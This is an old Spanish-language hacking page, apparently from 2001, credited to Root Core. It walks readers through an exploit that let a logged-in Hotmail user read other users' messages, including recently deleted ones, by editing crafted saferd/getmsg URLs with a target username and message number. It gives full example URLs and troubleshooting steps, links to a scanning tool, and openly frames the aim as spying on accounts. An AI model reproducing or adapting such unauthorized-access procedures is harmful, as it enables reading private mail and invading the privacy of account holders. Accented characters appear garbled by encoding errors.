Este exploit de root-core (http://www.root-core.

com/) permite ver

ciertos mensajes de cuentas de correo de hotmail conociendo
el nombre de usuario.

Tres Pasos para ver algunos correos en Hotmail

(Probado con Internet Explorer 5)

Para ver completamente un mensaje de alguna cuenta de hotmail hay que

hacer lo siguiente:

1. Acceder a Hotmail normalmente con tu nombre de usuario o con

cualquier otro que conozcas.

2. Utiliza un link como este para ver un mensaje espec�fico de un

usuario espec�fico:

http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd?
_lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fcgi%2dbin%
2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e22%26start%3d1%26len%
3d9999999999999999%26raw%3d0%26login%3dusername%26domain%3dhotmail%
2ecom&hm___fl=attrd&domain=hotmail.com

o bien:

http://lw14fd.law14.hotmail.msn.com/cgi-bin/saferd?
_lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fcgi%2dbin%
2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e22%26start%3d1%26len%
3d9999999999999999%26raw%3d0%26login%3dusername%26domain%3dhotmail%
2ecom&hm___fl=attrd&domain=hotmail.com

De ese link cambia los siguientes valores:

MSG943322803%2e16 (N�mero de mensaje, es s�mplemente un

contador. %2e
equivale a "." )
username (El nombre de usuario de la cuenta de correo que
quieras espiar)

Ejemplos de n�meros de mensaje:

MSG943322803%2e1
MSG943322803%2e22
MSG943322803%2e149

(borra "%26raw%3d0" si quieres ver el correo como una ventana normal

de hotmail en lugar de ver el mensaje como texto sin formato)

(borra "&hm___fl=attrd&domain=hotmail.com" si no quieres que aparezca

el frame superior de hotmail)

Nota. Todo lo parecido a "%2e", etc. son c�digos ascii

hexadecimal.
Debes utilizarlos en lugar de los caracteres normales.
Aqu� tienes una lista completa:
http://www.december.com/html/spec/ascii.html

3. Ya est�. Si introduces un n�mero de mensaje correcto puedes

leer ese determinado mensaje (siempre que exista ese mensaje claro :)
(Comprueba el m�todo antes con tus propios mensajes en hotmail
para saber como funciona).

Como teclear cada vez un n�mero de mensaje es un trabajo bastante

pesado, los chicos de root core han creado una peque�a utilidad
para escanear autom�ticamente un rango de mensajes de un usuario
espec�fico.
La puedes bajar aqu�: http://rootcore.can-host.
com/files/hobo04r2.zip
Para ver los mensajes necesitas trabajar con IExplorer y debes haber
entrado previamente en tu cuenta de Hotmail.

Prueba el fallo en estos links de prueba:

(1. Entra en tu cuenta de hotmail, 2. Copia estos links y pruebalos
en tu navegador)

Ejemplo texto sin formato (no se pueden ver los attach directamente)

http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd?
_lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fcgi%2dbin%
2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e22%26start%3d9702%26len%
3d9687%26raw%3d0%26disk%3d64%2e4%2e36%2e68_d1577%26login%
3djokutesti99%26domain%3dhotmail%
2ecom&hm___fl=attrd&domain=hotmail.com

ventana del buz�n normal: (puedes ver im�genes, etc. )

http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd?
_lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fcgi%2dbin%
2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e22%26start%3d9702%26len%
3d9687%26disk%3d64%2e4%2e36%2e68_d1577%26login%3djokutesti99%26domain%
3dhotmail%2ecom&hm___fl=attrd&domain=hotmail.com

Puedes ver tambi�n mensajes eliminados. Si borras un mensaje en

hotmail y despu�s vac�as la papelera, el mensaje es visible
usando este tipo de link durante unas 6-12 horas aproximadamente.

Correcciones y m�s cosas:

Cambios en el link:

Eliminar par�metro: %26disk%3d64%2e4%2e36%2e68_d1577

Este par�metro causa un error en algunos casos: "Due to an

internal error your request cannot be processed. We apologize for the
inconvenience. Please try again later."

Soluci�n. Eliminar este par�metro del link, no es necesario.

Cambios en los par�metros: %26start%3d9702%26len%3d9687 en lugar

de %26start%3d1%26len%3d9999999999999999

Este par�metro determina justo el comienzo y la longitud

visualizable del email. Si pones el valor demasiado peque�o el
email
se ver� justo ese n�mero de car�cteres.

Si el usuario no tiene ese mensaje en su buz�n, se obtiene este

mensaje de error:
" Subject: Unable to locate message Content-Type: text/plain;
charset=us-ascii An error has prevented from locating the message."

Si el usuario no existe, se obtiene una p�gina completamente en

blanco.

Si existe alg�n error en la sintaxis del link normalmente

aparecer� la p�gina de acceso de hotmail pidiendo de nuevo el
password.

Si tienes dificultades para ver mensajes comprueba que has

introducido correctamente el n�mero de mensaje.
(MSGXXXXXXXXX.YYY)
El valor Y puede ser oscilar entre 0-nnn. nnn puede ser lo que sea,
dependiendo del n�mero de mensajes en ese buz�n. 100, 200, etc.

Comprueba que la sintaxis del link es correcta.

Comprueba que has entrado en tu cuenta de Hotmail.

Prueba a cambiar el servidor. En lugar de pv2fd.pav2.hotmail ,

intentalo con lw14fd.law14.hotmail.

Si los links de prueba de Root Core ya no son operativos, sin duda es

debido a que hotmail ya ha solucionado el problema.

Lo m�s probable es que deje de funcionar en poco tiempo, pero de

momento comprobadlo. Los test aportados por Root Core funcionan al
100% as� que el fallo sigue activo. Hoy se cumplen 3 d�as desde
que se avis� del error a Hotmail. Hoy estamos a 21 de Agosto en
Espa�a.

Informaci�n completa y actualizada, por supuesto en Root Core:

http://www.root-core.com , y en la lista de correo de Bugtraq.

Hasta la pr�xima.
http://www.vanhackez.com